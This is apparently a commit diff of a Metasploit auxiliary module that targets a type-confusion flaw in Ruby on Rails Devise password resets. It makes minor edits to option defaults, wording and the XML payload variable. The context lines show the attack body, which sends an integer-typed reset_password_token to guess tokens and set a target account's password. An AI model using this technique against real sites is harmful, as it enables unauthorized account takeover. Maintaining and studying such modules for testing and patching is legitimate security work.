@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary
14
14
15
15
def initialize ( info = { } )
16
16
super ( update_info ( info ,
17
- 'Name' => 'Rails Devise Authentication Gem Password Reset' ,
17
+ 'Name' => 'Ruby on Rails Devise Authentication Password Reset' ,
18
18
'Description' => %q{
19
19
The Devise authentication gem for Ruby on Rails is vulnerable
20
20
to a password reset exploit leveraging type confusion. By submitting XML
@@ -48,10 +48,10 @@ def initialize(info = {})
48
48
register_options (
49
49
[
50
50
OptString . new ( 'URIPATH' , [ true , "The request URI" , '/users/password' ] ) ,
51
- OptString . new ( 'TARGETEMAIL' , [ true , "The Email address of target account" , '' ] ) ,
52
- OptString . new ( 'PASSWORD' , [ true , 'The password to set' , " #{ Rex :: Text . rand_text_alpha ( rand ( 10 ) + 5 ) } " ] ) ,
51
+ OptString . new ( 'TARGETEMAIL' , [ true , "The email address of target account" ] ) ,
52
+ OptString . new ( 'PASSWORD' , [ true , 'The password to set' ] ) ,
53
53
OptBool . new ( 'FLUSHTOKENS' , [ true , 'Flush existing reset tokens before trying' , true ] ) ,
54
- OptInt . new ( 'MAXINT' , [ true , "Max integer to try (Tokens begining with a higher int will fail)" , 10 ] )
54
+ OptInt . new ( 'MAXINT' , [ true , "Max integer to try (tokens begining with a higher int will fail)" , 10 ] )
55
55
] , self . class )
56
56
end
57
57
@@ -88,7 +88,7 @@ def reset_one(password, report=false)
88
88
89
89
xml = ""
90
90
xml << "<user>"
91
- xml << "<password>#{ xmlpass } </password>"
91
+ xml << "<password>#{ encode_pass } </password>"
92
92
xml << "<password_confirmation>#{ encode_pass } </password_confirmation>"
93
93
xml << "<reset_password_token type=\" integer\" >#{ int_to_try } </reset_password_token>"
94
94
xml << "</user>"
0 commit comments